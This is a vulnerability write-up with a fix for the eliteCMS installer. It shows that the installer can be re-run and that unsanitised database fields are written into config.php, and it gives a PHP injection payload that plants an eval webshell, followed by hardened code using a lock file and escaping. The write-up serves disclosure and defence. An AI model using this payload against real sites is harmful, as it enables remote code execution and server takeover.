The eliteCMS installer is not locked after installation finishes, so an attacker can simply request the installer URL again and re-run the installation.
A second vulnerability is that the installer can write a one-line webshell directly into admin/includes/config.php.
Let's look at the code:
```php
// ...
elseif ($_GET['step'] == "4") {
    $file = "../admin/includes/config.php";
    $write = "<?php\n";
    $write .= "/**\n";
    $write .= "*\n";
    $write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
    // ... omitted ...
    $write .= "*\n";
    $write .= "*/\n";
    $write .= "\n";
    // Session values are interpolated into the generated PHP source verbatim,
    // with no escaping or validation.
    $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
    $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";
    $write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
    $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
    $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";
    $write .= "if (!\$connection) {\n";
    $write .= "    die(\"Database connection failed\" .mysql_error());\n";
    $write .= "    \n";
    $write .= "} \n";
    $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";
    $write .= "if (!\$db_select) {\n";
    $write .= "    die(\"Database select failed\" .mysql_error());\n";
    $write .= "    \n";
    $write .= "} \n";
    $write .= "?>\n";

    // The assembled source is written straight to config.php.
    $writer = fopen($file, 'w');
    // ...
```
Now look at where those session values come from:

```php
// POST values are copied into the session without any validation.
$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
$_SESSION['DB_NAME'] = $_POST['DB_NAME'];
$_SESSION['DB_USER'] = $_POST['DB_USER'];
$_SESSION['DB_PASS'] = $_POST['DB_PASS'];
```
The values are taken without any validation.

If the database name is POSTed as:

"?><?php eval($_POST[c]);?><?php

a one-line backdoor is written into /admin/includes/config.php.
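The following is an added hardening example, not eliteCMS's own code: a simplified rewrite of the step-4 config writer that fixes both issues above. It refuses to run once an install lock file exists, allowlists the host, database and user names, and emits every value through var_export() so that a string containing `?><?php` lands in config.php as an inert quoted literal rather than as executable code. The lock-file path, the validate_config_value()/build_config() helpers and the sample input are assumptions made for this example.

```php
<?php
// Added hardening example (not eliteCMS code). Two fixes for the installer
// described above: refuse to run again once installed, and write config
// values as escaped PHP string literals instead of raw interpolated text.

$lockFile   = __DIR__ . '/install.lock';                 // assumed lock-file path
$configFile = __DIR__ . '/../admin/includes/config.php'; // path from the write-up

// Fix 1: the installer must not be re-runnable after a completed install.
if (file_exists($lockFile)) {
    http_response_code(403);
    exit('Installation already completed; remove install.lock to reinstall.');
}

// Allowlist check for values that should only ever be simple identifiers.
// The password may contain anything; the escaping in build_config() keeps it safe.
function validate_config_value(string $name, string $value): string
{
    if ($name !== 'DB_PASS' && !preg_match('/^[A-Za-z0-9_.:\-]{1,64}$/', $value)) {
        throw new InvalidArgumentException("Invalid value for $name");
    }
    return $value;
}

// Fix 2: var_export() returns a single-quoted PHP literal with ' and \ escaped,
// so a value like "?><?php ... ?>" cannot break out of the string.
function build_config(array $values): string
{
    $out = "<?php\n";
    foreach (['DB_SERVER', 'DB_NAME', 'DB_USER', 'DB_PASS'] as $key) {
        $literal = var_export(validate_config_value($key, $values[$key] ?? ''), true);
        $out .= "define('$key', $literal);\n";
    }
    $out .= "\$connection = mysqli_connect(DB_SERVER, DB_USER, DB_PASS, DB_NAME);\n";
    $out .= "if (!\$connection) {\n";
    $out .= "    die('Database connection failed: ' . mysqli_connect_error());\n";
    $out .= "}\n";
    return $out;
}

// Constructed sample input: the payload quoted in the write-up, submitted as DB_NAME.
$input = [
    'DB_SERVER' => 'localhost',
    'DB_NAME'   => '"?><?php eval($_POST[c]);?><?php',
    'DB_USER'   => 'cms',
    'DB_PASS'   => 's3cret',
];

try {
    $config = build_config($input);
    file_put_contents($configFile, $config, LOCK_EX);
    touch($lockFile); // lock the installer only after a successful write
    echo "config.php written and installer locked\n";
} catch (InvalidArgumentException $e) {
    // With the allowlist above the payload is rejected before anything is written.
    echo 'Rejected: ' . $e->getMessage() . "\n";
}
```

With the allowlist in place the sample input is rejected outright. Even if the allowlist were removed, var_export() would render the DB_NAME line as `define('DB_NAME', '"?><?php eval($_POST[c]);?><?php');`, a plain string constant that PHP never executes. The two defences are independent: the lock file stops the "reinstall" path, and the literal escaping stops the "write into config.php" path.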